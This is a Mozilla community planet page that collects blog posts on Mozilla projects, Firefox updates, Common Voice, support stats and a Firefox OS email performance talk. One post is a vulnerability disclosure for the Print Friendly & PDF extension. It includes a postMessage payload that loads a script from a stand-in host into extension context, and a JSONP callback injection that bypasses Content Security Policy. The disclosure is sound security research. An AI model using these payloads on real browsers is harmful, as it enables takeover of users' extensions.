mozilla

Mozilla Nederland LogoDe Nederlandse
Mozilla-gemeenschap

Andrew Halberstadt: Phabricator Etiquette Part 1: The Reviewer

Mozilla planet - di, 13/04/2021 - 21:42

In the next two posts we will examine the etiquette of using Phabricator. This post will examine tips from the reviewer’s perspective, and next week will focus on the author’s point of view. While the social aspects of etiquette are incredibly important, we should all be polite and considerate, these posts will focus more on the mechanics of using Phabricator. In other words, how to make the review process as smooth as possible without wasting anyone’s time.

Let’s dig in!

Categorieën: Mozilla-nl planet

Wladimir Palant: Print Friendly & PDF: Full compromise

Mozilla planet - di, 13/04/2021 - 12:41

I looked into the Print Friendly & PDF browser extension while helping someone figure out an issue they were having. The issue turned out unrelated to the extension, but I already noticed something that looked very odd. A quick investigation later I could confirm a massive vulnerability affecting all of its users (close to 1 million of them). Any website could easily gain complete control of the extension.

 800,000+ users

This particular issue has been resolved in Print Friendly & PDF 2.7.39 for Chrome. The underlying issues have not been addressed however, and the extension is still riddled with insecure coding practices. Hence my recommendation is still to uninstall it. Also, the Firefox variant of the extension (version 1.3) is still affected. I did not look at the Microsoft Edge variant but it hasn’t been updated recently and might also be vulnerable.

Note: To make the confusion complete, there is a browser extension called Print Friendly & PDF 2.1.0 on the Firefox Add-ons website. This one has no functionality beyond redirecting the user to printfriendly.com and isn’t affected. The problematic Firefox extension is being distributed from the vendor’s website directly.

Contents Summary of the findings

As of version 2.7.33 for Chrome and 1.3 for Firefox, Print Friendly & PDF marked two pages (algo.html and core.html) as web-accessible, meaning that any web page could load them. The initialization routine for these pages involved receiving a message event, something that a website could easily send as well. Part of the message data were scripts that would then be loaded in extension context. While normally Content Security Policy would prevent exploitation of this Cross-Site Scripting vulnerability, here this protection was relaxed to the point of being easily circumvented. So any web page could execute arbitrary JavaScript code in the context of the extension, gaining any privileges that the extension had.

The only factor slightly alleviating this vulnerability was the fact that the extension did not request too many privileges:

"permissions": [ "activeTab", "contextMenus" ],

So any code running in the extension context could “merely”:

  • Persist until a browser restart, even if the website it originated from is closed
  • Open new tabs and browser windows at any time
  • Watch the user opening and closing tabs as well as navigating to pages, but without access to page addresses or titles
  • Arbitrarily manipulate the extension’s icon and context menu item
  • Gain full access to the current browser tab whenever this icon or context menu item was clicked
Insecure communication

When the Print Friendly & PDF extension icon is clicked, the extension first injects a content script into the current tab. This content script then adds a frame pointing to the extension’s core.html page. This requires core.html to be web-accessible, so any website can load that page as well (here assuming Chrome browser):

<iframe src="chrome-extension://ohlencieiipommannpdfcmfdpjjmeolj/core.html"></iframe>

Next the content script needs the frame to initialize. And so it takes a shortcut by using window.postMessage and sending a message to the frame. While being convenient, this API is also rarely used securely in a browser extension (see Chromium issue I filed). Here is what the receiving end looks like in this case:

window.addEventListener('message', function(event) { if (event.data) { if (event.data.type === 'PfLoadCore' && !pfLoadCoreCalled) { pfLoadCoreCalled = true; var payload = event.data.payload; var pfData = payload.pfData; var urls = pfData.config.urls; helper.loadScript(urls.js.jquery); helper.loadScript(urls.js.raven); helper.loadScript(urls.js.core, function() { window.postMessage({type: 'PfStartCore', payload: payload}, '*'); }); helper.loadCss(urls.css.pfApp, 'screen'); } } });

No checks performed here, any website can send a message like that. And helper.loadScript() does exactly what you would expect: it adds a <script> tag to the current (privileged) extension script and attempts to load whatever script it was given.

So any web page that loaded this frame can do the following:

var url = "https://example.com/xss.js"; frame.contentWindow.postMessage({ type: "PfLoadCore", payload: { pfData: { config: { urls: { js: { jquery: url } } } } } }, "*")

And the page will attempt to load this script, in the extension context.

Getting around Content Security Policy

With most web pages, this would be the point where attackers could run arbitrary JavaScript code. Browser extensions are always protected by Content Security Policy however. The default strict-src 'self' policy makes exploiting Cross-Site Scripting vulnerabilities difficult (but not impossible).

But Print Friendly & PDF does not stick to the default policy. Instead, what they have is the following:

"content_security_policy": "script-src 'self' https://cdn.printfriendly.com https://www.printfriendly.com https://v.printfriendly.com https://key-cdn.printfriendly.com https://ds-4047.kxcdn.com https://www.google-analytics.com https://platform.twitter.com https://api.twitter.com https://cdnjs.cloudflare.com https://cdn.ravenjs.com",

Yes, that’s a very long list of web servers that JavaScript code can come from. In particular, the CDN servers host all kinds of JavaScript libraries. But one doesn’t really have to go there. Elsewhere in the extension code one can see:

var script = document.createElement("script"); script.src = this.config.hosts.ds_cdn + "/api/v3/domain_settings/a?callback=pfMod.saveAdSettings&hostname=" + this.config.hosts.page + "&client_version=" + hokil.version;

See that callback parameter? That’s JSONP, the crutch web developers used for cross-domain data retrieval before Cross-Origin Resource Sharing was widely available. It’s essentially Cross-Site Scripting but intentionally. And the callback parameter becomes part of the script.

Nowadays JSONP endpoints which are kept around for legacy reasons will usually only allow certain characters in the callback name. Not so in this case. Loading https://www.printfriendly.com/api/v3/domain_settings/a?callback=alert(location.href)//&hostname=example.com will result in the following script:

/**/alert(location.href)//(...)

So here we can inject any code into a script that is located on the www.printfriendly.com domain. If we ask the extension to load this one, Content Security Policy will no longer prevent it. Done, injection of arbitrary code into the extension context, full compromise.

What’s fixed and what isn’t

More than two months after reporting this issue I checked in on the progress. I discovered that, despite several releases, the current extension version was still vulnerable. So I sent a reminder to the vendor, warning them about the disclosure deadline getting close. The response was reassuring:

We are working on it. […] We will be finishing the update before the deadline.

When I finally looked at the fix before this publication, I noticed that it merely removed the problematic message exchange. The communication now went via the extension’s background page as it should. That’s it.

While this prevents exploitation of the issue as outlined here, all other problematic choices remain intact. In particular, the extension continues to relax Content Security Policy protection. Given how this extension works, my recommendation was hosting the core.html frame completely remotely. This has not been implemented.

No callback name validation has been added to the JSONP endpoints on www.printfriendly.com (there are multiple), so Content Security Policy integrity hasn’t been ensured this way either.

Not just that, the extension continues to use JSONP for some functionality, even in privileged contexts. The JavaScript code executed here comes not merely from www.printfriendly.com but also from api.twitter.com for example. For reference: there is absolutely no valid reason for a browser extension to use JSONP.

And while the insecure message exchange has been removed, some of the extension’s interactions with web pages remain highly problematic.

Timeline
  • 2021-01-13: Reported the vulnerability to the vendor
  • 2021-01-13: Received confirmation that the issue is being looked at
  • 2021-03-21: Reminded the vendor of the disclosure deadline
  • 2021-03-22: Received confirmation that the issue will be fixed in time
  • 2021-04-07: Received notification about the issue being resolved
  • 2021-04-12: Notified the vendor about outstanding problems and lack of a Firefox release
Categorieën: Mozilla-nl planet

Daniel Stenberg: talking curl on changelog again

Mozilla planet - di, 13/04/2021 - 00:26

We have almost a tradition now, me and the duo Jerod and Adam of the Changelog podcast. We talk curl and related stuff every three years. Back in 2015 we started out in episode 153 and we did the second one in episode 299 in 2018.

Time flies and now we’re in 2021 and we did again “meet up” virtually and talked curl and related stuff for a while. curl is now 23 years old and I still run the project, a few things have changed since the last curl episode and I asked my twitter friends for what they wanted to know and I think we managed to get a whole bunch of such topics into the mix.

So, here’s the 2021 edition of Daniel on the Changelog podcast: episode 436.

The Changelog 436: Curl is a full-time job (and turns 23) – Listen on Changelog.com

Anyone want to bet if we’ll do it again in 2024?

Categorieën: Mozilla-nl planet

Firefox Nightly: These Weeks in Firefox: Issue 91

Mozilla planet - ma, 12/04/2021 - 19:12
Highlights
  • Starting from Firefox 89, we now support dynamic imports in extension content scripts. Thanks to evilpie for working on fixing this long standing enhancement request!
    • NOTE: the docs have not been updated yet, refer to the new test cases landed as part of Bug 1536094 to get an idea of how to use it in extension content scripts.
  • Entering a term like “seti@home” or “folding@home” in the URL bar should now search by default, rather than treating it like a URL (Bug 1693503)
Friends of the Firefox team

For contributions made from March 23, 2021 to April 6, 2021, inclusive.

Resolved bugs (excluding employees) Fixed more than one bug
  • Anshul Sahai
  • Claudia Batista [:claubatista]
  • Falguni Islam
  • Itiel
  • Kajal Sah
  • Michelle Goossens
  • Tim Nguyen :ntim
Project Updates Add-ons / Web Extensions WebExtensions Framework
  • Changes to devtools API internals related to the ongoing DevTools Fission work (Bug 1699493). Thanks to Alex Poirot for taking care of the extension APIs side of this fission-related refactoring.
  • Allowed sandboxed extension sub frames to load their own resources (Bug 1700762)
  • Fixed a non critical regression related to the error message for a browser.runtime.sendMessage call to the extension id for an extension that isn’t installed (Bug 1643176):
    • NOTE: non-critical because the regression was hiding the expected error message behind a generic “An unexpected error occurred” message, but under conditions that were already expected to return a rejected promise
  • Small fission-related fix related to a errors logged while navigating to a url loaded in different process a content process iframe attached by a content script (Bug 1697774)
    • NOTE: the issue wasn’t actually introducing any breakage, but that is an expected scenario in fission and it should be handled gracefully to avoid spamming the logs
WebExtension APIs
  • webNavigation API: part of the webNavigation API internals have been rewritten in C++ as part of the Fission related changes to the WebExtensions framework (Bug 1581859). Thanks to Kris Maglione for his work on this fission-related refactoring
    • NOTE: let us know if you do notice regressions in behavior that may be related to the webNavigation API (e.g. D110173, attached to Bug 1594921, it has been fixed a regression related to webNavigation events related to the the initial about:blank document emitted more often than the previous “frame scripts”-based implementation)
  • tabs API: Fixed a bug that was turning hidden tab’s URLs into “about:blank” when an hidden tab is moved between windows while an extension has registered a tabs.onUpdated listener that uses a url-based events filter (Bug 1695346).
Addon Manager & about:addons
  • Fixed regression related to the about:addons extensions options page modals (Bug 1702059)
    • NOTE: In Firefox 89 WebExtensions options_ui pages will keep using the previous tab modal implementation, which is helpful in the short run to allow our Photon tab prompts restyling to ride the train as is, in a followup we will have to do some more work to look into porting these modals to the new implementation
  • Bug 1689240: Last bits of a set of simplifications and internal refactoring for the about:addons page initially contributed by ntim (plus some more tweaks we did to finalize and land it). Thanks to ntim for getting this started!
Installer & Updater Messaging System
  • Launched “1-Click Pin During Onboarding” experiment to 100% of new 87 Windows 1903+ users via Nimbus Preview -> Live (avoiding a copy/paste error from stage)
Password Manager Performance
  • Doug Thayer fixed a bug where skeleton UI was breaking scroll inertia on Windows.
  • Emma Malysz is continuing work on OS.File bugs.
  • Florian Quèze is fixing tests and cleaning up old code.
Performance Tools
  • Enabled the new profiler recording panel in dev edition (thanks nicolas from devtools team).
  • Added Android device information inside the profile data and started to show it in the profile meta panel.
  • Fixed the network markers with service workers. Previously it was common to use “unfinished” markers. More fixes are coming.
  • Removed many MOZ_GECKO_PROFILER ifdefs. Less places to potentially break on Tier-3 platform builds.
  • You can now import Android trace format to Firefox Profiler analysis UI. Just drag and drop the .trace file into firefox.profiler.com, it will import and open it automatically.
  • Added new markers:
    • Test markers (in TestUtils.jsm and BrowserTestUtils.jsm)
    • “CSS animation”
    • “CSS transition”
Search and Navigation
  • Fixed flickering of some specific results in the Address Bar – Bug 1699211, Bug 1699227
  • New tab search field hand-off to the Address Bar now uses the default Address Bar empty search mode instead of entering Search Mode for the default engine – Bug 1616700
  • The Search Service now exposes an “isGeneralPurposeEngine” property on search engines, that identifies engines searching the Web, rather than specific resources or products. This may be extended in the future to provide some kind of categorization of engines. – Bug 1697477
  • Re-enabling a WebExtension engine should re-prompt the user if it wants to be set as default search engine – Bug 1646338
Screenshots
Categorieën: Mozilla-nl planet

The Mozilla Blog: Mozilla partners with NVIDIA to democratize and diversify voice technology

Mozilla planet - ma, 12/04/2021 - 19:00

As technology makes massive shift to voice-enabled products, NVIDIA invests $1.5 million in Mozilla Common Voice to transform the voice recognition landscape 

Over the next decade, speech is expected to become the primary way people interact with devices — from laptops and phones to digital assistants and retail kiosks. Today’s voice-enabled devices, however, are inaccessible to much of humanity because they cannot understand vast swaths of the world’s languages, accents, and speech patterns.

To help ensure that people everywhere benefit from this massive technological shift, Mozilla is partnering with NVIDIA, which is investing $1.5 million in Mozilla Common Voice, an ambitious, open-source initiative aimed at democratizing and diversifying voice technology development.

Most of the voice data currently used to train machine learning algorithms is held by a handful of major companies. This poses challenges for others seeking to develop high-quality speech recognition technologies, while also exacerbating the voice recognition divide between English speakers and the rest of the world.

Launched in 2017, Common Voice aims to level the playing field while mitigating AI bias. It enables anyone to donate their voices to a free, publicly available database that startups, researchers, and developers can use to train voice-enabled apps, products, and services. Today, it represents the world’s largest multi-language public domain voice data set, with more than 9,000 hours of voice data in 60 different languages, including widely spoken languages and less used ones like Welsh and Kinyarwanda, which is spoken in Rwanda. More than 164,000 people worldwide have contributed to the project thus far.

This investment will accelerate the growth of Common Voice’s data set, engage more communities and volunteers in the project, and support the hiring of new staff.

To support the expansion, Common Voice will now operate under the umbrella of the Mozilla Foundation as part of its initiatives focused on making artificial intelligence more trustworthy. According to the Foundation’s Executive Director, Mark Surman, Common Voice is poised to pioneer data donation as an effective tool the public can use to shape the future of technology for the better.

“Language is a powerful part of who we are, and people, not profit-making companies, are the right guardians of how language appears in our digital lives,” said Surman. “By making it easy to donate voice data, Common Voice empowers people to play a direct role in creating technology that helps rather than harms humanity. Mozilla and NVIDIA both see voice as a prime opportunity where people can take back control of technology and unlock its full potential.”

“The demand for conversational AI is growing, with chatbots and virtual assistants impacting nearly every industry,” said Kari Briski, senior director of accelerated computing product management at NVIDIA. “With Common Voice’s large and open datasets, we’re able to develop pre-trained models and offer them back to the community for free. Together, we’re working toward a shared goal of supporting and building communities — particularly for under-resourced and under-served languages.”

The post Mozilla partners with NVIDIA to democratize and diversify voice technology appeared first on The Mozilla Blog.

Categorieën: Mozilla-nl planet

Niko Matsakis: Async Vision Doc Writing Sessions V

Mozilla planet - ma, 12/04/2021 - 06:00

This is an exciting week for the vision doc! As of this week, we are starting to draft “shiny future” stories, and we would like your help! (We are also still working on status quo stories, so there is no need to stop working on those.) There will be a blog post coming out on the main Rust blog soon with all the details, but you can go to the “How to vision: Shiny future” page now.

This week, Ryan Levick and I are going to be hosting four Async Vision Doc Writing Sessions. Here is the schedule:

When Who Topic Wed at 07:00 ET Ryan TBD Wed at 15:00 ET Niko Shiny future – Niklaus simulates hydrodynamics Fri at 07:00 ET Ryan TBD Fri at 14:00 ET Niko Shiny future – Portability across runtimes

The idea for shiny future is to start by looking at the existing stories we have and to imagine how they might go differently. To be quite honest, I am not entirely how this is going to work, but we’ll figure it out together. It’s going to be fun. =) Come join!

Categorieën: Mozilla-nl planet

Support.Mozilla.Org: What’s up with SUMO – Q1 2021

Mozilla planet - vr, 09/04/2021 - 09:14

Hey SUMO folks,

Starting from this month, we’d like to reenact our old tradition to have the summary of what’s happening in our SUMO nation. But instead of weekly like the old days, we’re going to have a monthly updates. This post will be an exception though, as we’d like to recap the entire Q1 of 2021.

So, let’s get to it!

Welcome on board!
  1. Welcome to bingchuanjuzi (rebug). Thank you for your contribution to 62 zh-CN articles despite just getting started in Oct 2020.
  2. Hello and welcome Vinay to the Gujarati localization group. Thanks for picking up the work in a locale that has been inactive for awhile.
  3. Welcome back to JCPlus. Thank you for stewarding the Norsk (No) locale.
  4. Welcome brisu and Manu! Thank you for helping us with Firefox for iOS questions.
  5. Welcome to Kaio Duarte to the Social Support program!
  6. Devin and Matt C for their comeback to Social Support program (Devin has helped us with Buffer Reply and Matt was part of Army of Awesome program in the past).

Last but not least, let’s join us to welcome to Fabi and Daryl to the SUMO team. Fabi is the new Technical Writer (although, I should note that she will be helping us with Spanish localization as well) and Daryl is joining us as a Senior User Experience Designer. Welcome both!

Community news
  • Play Store Support is transitioning to Conversocial. Please read the full announcement in our blog if you haven’t.
  • Are you following news about Firefox? If yes is your answer, then I have good news for you. You can now subscribe to Firefox Daily Digest to get updates about what people are talking about Firefox and other Mozilla products on social media like Reddit and Twitter.
  • Another good news from the Twitter-land. Finally, we regain our access to @SUMO_mozilla Twitter account (if you want to learn the backstory, go watch our community call in March). Also, go follow the account if you haven’t because we’re going to use it to share more community updates moving forward.
  • Check out the following release notes from Kitsune in the past quarter:
Community call
  • Watch the monthly community call if you haven’t. Learn more about what’s new in January, February, and March.
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.
Community stats KB

KB Page views

Month Page views Vs previous month January 2020 12,860,141 +3.72% February 2020 11,749,283 -9.16% March 2020 12,143,366 +3.2%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Jeff
  3. Marchelo Ghelman
  4. Artist
  5. Underpass
KB Localization

Top 10 locale based on total page views

Locale Jan 2020 Feb 2020 Mar 2020 Localization progress (per 6 Apr) de 11.69% 11.3% 10.4% 98% fr 7.33% 7.23% 6.82% 90% es 5.98% 6.48% 6.4% 47% zh-CN 4.7% 4.14% 5.94% 97% ru 4.56% 4.82% 4.41% 99% pt-BR 4.56% 5.41% 5.8% 72% ja 3.64% 3.61% 3.68% 57% pl 2.56% 2.54% 2.44% 83% it 2.5% 2.44% 2.45% 95% nl 1.03% 0.99% 0.98% 98%

Top 5 localization contributor in the last 90 days: 

  1. Ihor_ck
  2. Artist
  3. Markh2
  4. JimSp472
  5. Goudron
Forum Support

Forum stats

Month Total questions Answer rate within 72 hrs Solved rate within 72 hrs Forum helpfulness Jan 2020 3936 68.50% 15.52% 70.21% Feb 2020 3582 65.33% 14.38% 77.50% Mar 2020 3639 66.34% 14.70% 81.82%

Top 5 forum contributor in the last 90 days: 

  1. Cor-el
  2. FredMcD
  3. Jscher2000
  4. Sfhowes
  5. Seburo
Social Support Channel Jan 2020 Feb 2020 Mar 2020 Total conv Conv handled Total conv Conv handled Total conv Conv handled @firefox 3,675 668 3,403 136 2,998 496 @FirefoxSupport 274 239 188 55 290 206

Top 5 contributors in Q1 2021

  1. Md Monirul Alom
  2. Andrew Truong
  3. Matt C
  4. Devin E
  5. Christophe Villeneuve
Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates Firefox desktop Firefox mobile
  • What’s new in Firefox for Android
  • Additional messaging to set Firefox as a default app were added in Firefox for iOS 32.
  • There’s also additional widget for iOS as well as improvement on bookmarking that were introduced in V32.
Other products / Experiments
  • VPN MacOS and Linux Release.
  • VPN Feature Updates Release.
  • Firefox Accounts Settings Updates.
  • Mozilla ION → Rally name change
  • Add-ons project – restoring search engine defaults.
  • Sunset of Amazon Fire TV.
Shout-outs!

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to   add them in our next edition.

Useful links:
Categorieën: Mozilla-nl planet

The Mozilla Blog: Reflections on One Year as the CEO of Mozilla

Mozilla planet - do, 08/04/2021 - 19:35

If we want the internet to be different we can’t keep following the same roadmap.

I am celebrating a one-year anniversary at Mozilla this week, which is funny in a way, since I have been part of Mozilla since before it had a name. Mozilla is in my DNA–and some of my DNA is in Mozilla. Twenty-two years ago I wrote the open-source software licenses that still enable our vision, and throughout my years here I’ve worn many hats. But one year ago I became CEO for the second time, and I have to say up front that being CEO this time around is the hardest role I’ve held here. And perhaps the most rewarding.

On this anniversary, I want to open up about what it means to be the CEO of a mission-driven organization in 2021, with all the complications and potential that this era of the internet brings with it. Those of you who know me, know I am generally a private person. However, in a time of rapid change and tumult for our industry and the world, it feels right to share some of what this year has taught me.

Six lessons from my first year as CEO:

1 AS CEO I STRADDLE TWO WORLDS: There has always been a tension at Mozilla, between creating products that reflect our values as completely as we can imagine, and products that fit consumers’ needs and what is possible in the current environment. At Mozilla, we feel the push and pull of competing in the market, while always seeking results from a mission perspective. As CEO, I find myself embodying this central tension.

It’s a tension that excites and energizes me. As co-founder and Chair, and Chief Lizard Wrangler of the Mozilla project before that, I have been the flag-bearer for Mozilla’s value system for many years. I see this as a role that extends beyond Mozilla’s employees. The CEO is responsible for all the employees, volunteers, products and launches and success of the company, while also being responsible for living up to the values that are at Mozilla’s core. Now, I once again wear both of these hats.

I have leaned on the open-source playbook to help me fulfill both of these obligations, attempting to wear one hat at a time, sometimes taking one off and donning the other in the middle of the same meeting. But I also find I am becoming more adept at seamlessly switching between the two, and I find that I can be intensely product oriented, while maintaining our mission as my true north.

2 MOZILLA’S MISSION IS UNCHANGED BUT HOW WE GET THERE MUST: This extremely abnormal year, filled with violence, illness ,and struggle, has also confirmed something I already knew: that even amid so much flux, the DNA of Mozilla has not changed since we first formed the foundation out of the Netscape offices so many years ago. Yes, we expanded our mission statement once to be more explicit about the human experience as a more complete statement of our values.

What has changed is the world around us. And — to stick with the DNA metaphor for a second here — that has changed the epigenetics of Mozilla. In other words, it has changed the way our DNA is expressed.

3 CHANGE REQUIRES FOLLOWING A NEW PATH: We want the internet to be different. We feel an urgency to create a new and better infrastructure for the digital world, to help people get the value of data in a privacy-forward way, and to connect entrepreneurs who also want a better internet.

By definition, if you’re trying to end up in a different place, you can’t keep following the same path. This is my working philosophy. Let me tell a quick story to illustrate what I mean.

Lately we’ve been thinking a lot about data, and what it means to be a privacy-focused company that brings the benefits of data to our users. This balancing act between privacy and convenience is, of course, not a new problem, but as I was thinking about the current ways it manifests, I was reminded of the early days of Firefox.

When we first launched Firefox, we took the view that data was bad — even performance metrics about Firefox that could help us understand how Firefox performs outside of our own test environments, we viewed as private data we didn’t want. Well, you see where this is going, don’t you? We quickly learned that without such data (which we call telemetry), we couldn’t make a well functioning browser. We needed information about when or why a site crashed, how long load times were, etc. And so we took one huge step with launching Firefox, and then we had to take a step sideways, to add in the sufficient — but no more than that! — data that would allow the product to be what users wanted.

In this story you can see how we approach the dual goals of Mozilla: to be true to our values, and to create products that enable people to have a healthier experience on the internet. We find ourselves taking a step sideways to reach a new path to meet the needs of our values, our community and our product.

4 THE SUM OF OUR PARTS: Mozilla’s superpower is that our mission and our structure allow us to benefit from the aggregate strength that’s created by all our employees and volunteers and friends and users and supporters and customers.

We are more than the sum of our parts. This is my worldview, and one of the cornerstones of open-source philosophy. As CEO, one of my goals is to find new ways for Mozilla to connect with people who want to build a better internet. I know there are many people out there who share this vision, and a key goal of the coming era is finding ways to join or help communities that are also working toward a better internet.

5 BRING ME AMBITIOUS IDEAS: I am always looking for good ideas, for big ideas, and I have found that as CEO, more people are willing to come to me with their huge ambitions. I relish it. These ideas don’t always come from employees, though many do. They also come from volunteers, from people outside the company entirely, from academics, friends, all sorts of people. They honor me and Mozilla by sharing these visions, and it’s important to me to keep that dialogue open.

I am learning that it can be jarring to have your CEO randomly stop by your desk for a chat — or in remote working land, to Slack someone unexpectedly — so there need to be boundaries in place, but having a group of people who I can trust to be real with me, to think creatively with me, is essential.

The pandemic has made this part of my year harder, since it has removed the serendipity of conversations in the break room or even chance encounters at conferences that sometimes lead to the next great adventure. But Mozilla has been better poised than most businesses to have an entirely remote year, given that our workforce was already between 40 and 50 percent distributed to begin with.

6 WE SEEK TO BE AN EXAMPLE: One organization can’t change everything. At Mozilla, we dream of an internet and software ecosystem that is diverse and distributed, that uplifts and connects and enables visions for all, not just those companies or people with bottomless bank accounts. We can’t bring about this change single handedly, but we can try to change ourselves where we think we need improvement, and we can stand as an example of a different way to do things. That has always been what we wanted to do, and it remains one of our highest goals.

Above all, this year has reinforced for me that sometimes a deeply held mission requires massive wrenching change in order to be realized. I said last year that Mozilla was entering a new era that would require shifts. Our growing ambition for mission impact brings the will to make these changes, which are well underway. From the earliest days of our organization, people have been drawn to us because Mozilla captures an aspiration for something better and the drive to actually make that something happen. I cannot overstate how inspiring it is to see the dedication of the Mozilla community. I see it in our employees, I see it in our builders, I see it in our board members and our volunteers. I see it in all those who think of Mozilla and support our efforts to be more effective and have more impact. I wouldn’t be here without it. It’s the honor of my life to be in the thick of it with the Mozilla community.

– Mitchell

The post Reflections on One Year as the CEO of Mozilla appeared first on The Mozilla Blog.

Categorieën: Mozilla-nl planet

Ludovic Hirlimann: My geeking plans for this summer

Thunderbird - do, 07/05/2015 - 10:39

During July I’ll be visiting family in Mongolia but I’ve also a few things that are very geeky that I want to do.

The first thing I want to do is plug the Ripe Atlas probes I have. It’s litle devices that look like that :

Hello @ripe #Atlas !

They enable anybody with a ripe atlas or ripe account to make measurements for dns queries and others. This helps making a global better internet. I have three of these probes I’d like to install. It’s good because last time I checked Mongolia didn’t have any active probe. These probes will also help Internet become better in Mongolia. I’ll need to buy some network cables before leaving because finding these in mongolia is going to be challenging. More on atlas at https://atlas.ripe.net/.

The second thing I intend to do is map Mongolia a bit better on two projects the first is related to Mozilla and maps gps coordinateswith wifi access point. Only a little part of The capital Ulaanbaatar is covered as per https://location.services.mozilla.com/map#11/47.8740/106.9485 I want this to be way more because having an open data source for this is important in the future. As mapping is my new thing I’ll probably edit Openstreetmap in order to make the urban parts of mongolia that I’ll visit way more usable on all the services that use OSM as a source of truth. There is already a project to map the capital city at http://hotosm.org/projects/mongolia_mapping_ulaanbaatar but I believe osm can server more than just 50% of mongolia’s population.

I got inspired to write this post by mu son this morning, look what he is doing at 17 months :

Geeking on a Sun keyboard at 17 months
Categorieën: Mozilla-nl planet

Andrew Sutherland: Talk Script: Firefox OS Email Performance Strategies

Thunderbird - do, 30/04/2015 - 22:11

Last week I gave a talk at the Philly Tech Week 2015 Dev Day organized by the delightful people at technical.ly on some of the tricks/strategies we use in the Firefox OS Gaia Email app.  Note that the credit for implementing most of these techniques goes to the owner of the Email app’s front-end, James Burke.  Also, a special shout-out to Vivien for the initial DOM Worker patches for the email app.

I tried to avoid having slides that both I would be reading aloud as the audience read silently, so instead of slides to share, I have the talk script.  Well, I also have the slides here, but there’s not much to them.  The headings below are the content of the slides, except for the one time I inline some code.  Note that the live presentation must have differed slightly, because I’m sure I’m much more witty and clever in person than this script would make it seem…

Cover Slide: Who!

Hi, my name is Andrew Sutherland.  I work at Mozilla on the Firefox OS Email Application.  I’m here to share some strategies we used to make our HTML5 app Seem faster and sometimes actually Be faster.

What’s A Firefox OS (Screenshot Slide)

But first: What is a Firefox OS?  It’s a multiprocess Firefox gecko engine on an android linux kernel where all the apps including the system UI are implemented using HTML5, CSS, and JavaScript.  All the apps use some combination of standard web APIs and APIs that we hope to standardize in some form.

Firefox OS homescreen screenshot Firefox OS clock app screenshot Firefox OS email app screenshot

Here are some screenshots.  We’ve got the default home screen app, the clock app, and of course, the email app.

It’s an entirely client-side offline email application, supporting IMAP4, POP3, and ActiveSync.  The goal, like all Firefox OS apps shipped with the phone, is to give native apps on other platforms a run for their money.

And that begins with starting up fast.

Fast Startup: The Problems

But that’s frequently easier said than done.  Slow-loading websites are still very much a thing.

The good news for the email application is that a slow network isn’t one of its problems.  It’s pre-loaded on the phone.  And even if it wasn’t, because of the security implications of the TCP Web API and the difficulty of explaining this risk to users in a way they won’t just click through, any TCP-using app needs to be a cryptographically signed zip file approved by a marketplace.  So we do load directly from flash.

However, it’s not like flash on cellphones is equivalent to an infinitely fast, zero-latency network connection.  And even if it was, in a naive app you’d still try and load all of your HTML, CSS, and JavaScript at the same time because the HTML file would reference them all.  And that adds up.

It adds up in the form of event loop activity and competition with other threads and processes.  With the exception of Promises which get their own micro-task queue fast-lane, the web execution model is the same as all other UI event loops; events get scheduled and then executed in the same order they are scheduled.  Loading data from an asynchronous API like IndexedDB means that your read result gets in line behind everything else that’s scheduled.  And in the case of the bulk of shipped Firefox OS devices, we only have a single processor core so the thread and process contention do come into play.

So we try not to be a naive.

Seeming Fast at Startup: The HTML Cache

If we’re going to optimize startup, it’s good to start with what the user sees.  Once an account exists for the email app, at startup we display the default account’s inbox folder.

What is the least amount of work that we can do to show that?  Cache a screenshot of the Inbox.  The problem with that, of course, is that a static screenshot is indistinguishable from an unresponsive application.

So we did the next best thing, (which is) we cache the actual HTML we display.  At startup we load a minimal HTML file, our concatenated CSS, and just enough Javascript to figure out if we should use the HTML cache and then actually use it if appropriate.  It’s not always appropriate, like if our application is being triggered to display a compose UI or from a new mail notification that wants to show a specific message or a different folder.  But this is a decision we can make synchronously so it doesn’t slow us down.

Local Storage: Okay in small doses

We implement this by storing the HTML in localStorage.

Important Disclaimer!  LocalStorage is a bad API.  It’s a bad API because it’s synchronous.  You can read any value stored in it at any time, without waiting for a callback.  Which means if the data is not in memory the browser needs to block its event loop or spin a nested event loop until the data has been read from disk.  Browsers avoid this now by trying to preload the Entire contents of local storage for your origin into memory as soon as they know your page is being loaded.  And then they keep that information, ALL of it, in memory until your page is gone.

So if you store a megabyte of data in local storage, that’s a megabyte of data that needs to be loaded in its entirety before you can use any of it, and that hangs around in scarce phone memory.

To really make the point: do not use local storage, at least not directly.  Use a library like localForage that will use IndexedDB when available, and then fails over to WebSQLDatabase and local storage in that order.

Now, having sufficiently warned you of the terrible evils of local storage, I can say with a sorta-clear conscience… there are upsides in this very specific case.

The synchronous nature of the API means that once we get our turn in the event loop we can act immediately.  There’s no waiting around for an IndexedDB read result to gets its turn on the event loop.

This matters because although the concept of loading is simple from a User Experience perspective, there’s no standard to back it up right now.  Firefox OS’s UX desires are very straightforward.  When you tap on an app, we zoom it in.  Until the app is loaded we display the app’s icon in the center of the screen.  Unfortunately the standards are still assuming that the content is right there in the HTML.  This works well for document-based web pages or server-powered web apps where the contents of the page are baked in.  They work less well for client-only web apps where the content lives in a database and has to be dynamically retrieved.

The two events that exist are:

DOMContentLoaded” fires when the document has been fully parsed and all scripts not tagged as “async” have run.  If there were stylesheets referenced prior to the script tags, the script tags will wait for the stylesheet loads.

load” fires when the document has been fully loaded; stylesheets, images, everything.

But none of these have anything to do with the content in the page saying it’s actually done.  This matters because these standards also say nothing about IndexedDB reads or the like.  We tried to create a standards consensus around this, but it’s not there yet.  So Firefox OS just uses the “load” event to decide an app or page has finished loading and it can stop showing your app icon.  This largely avoids the dreaded “flash of unstyled content” problem, but it also means that your webpage or app needs to deal with this period of time by displaying a loading UI or just accepting a potentially awkward transient UI state.

(Trivial HTML slide)

<link rel=”stylesheet” ...> <script ...></script> DOMContentLoaded!

This is the important summary of our index.html.

We reference our stylesheet first.  It includes all of our styles.  We never dynamically load stylesheets because that compels a style recalculation for all nodes and potentially a reflow.  We would have to have an awful lot of style declarations before considering that.

